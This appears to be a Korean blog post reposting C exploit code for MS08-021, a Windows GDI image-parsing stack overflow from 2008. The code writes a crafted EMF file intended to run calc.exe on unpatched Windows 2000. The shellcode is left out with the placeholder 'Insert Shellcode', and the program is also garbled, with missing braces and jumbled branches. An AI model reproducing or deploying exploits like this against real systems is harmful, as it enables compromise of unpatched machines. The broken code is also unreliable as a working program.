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MS Windows GDI Image Parsing Stack Overflow Exploit

4월 14일 공개된 MS GDI Image Parsing 관련 Exploit Code.


Shellcode 는 넘 커서 파일첨부로 따로 ;;


MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)


///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
///          automatically run calc.exe in Win2kSP4 CHS Version
///    with MS07-046 patched but no MS08-021 is installed.
///    In Windows XP SP2, explorer.exe will crashed but
///          calc will not be run.

#include "stdlib.h"
///The raw EMF data.
///Shellcode included.(Metasploit)
unsigned char data[130168] = {

Insert Shellcode


///The main function to generate the EMF file
int _tmain(int argc, _TCHAR* argv[])
///Exploit the MS08-021 : Stack Overflow on GDI API\n\
///Author: Lamhtz\n\
///Date: April 14th, 2008\n\
///Usage: <appname.exe> [filename]\n\
///Your filename must end with .emf\n\
 if (argc != 2)
  printf("Usage: <appname.exe> [filename]\n");
 FILE *stream;

   if( fopen_s( &stream, argv[1], "w+b" ) == 0 )
      printf("Generating %s....\n", argv[1]);
   fwrite( data, sizeof(data) ,1 , stream );
      printf( "%s created ! \n", argv[1] );
      fclose( stream );

    printf("File Created Failure ! \n");
 return 0;

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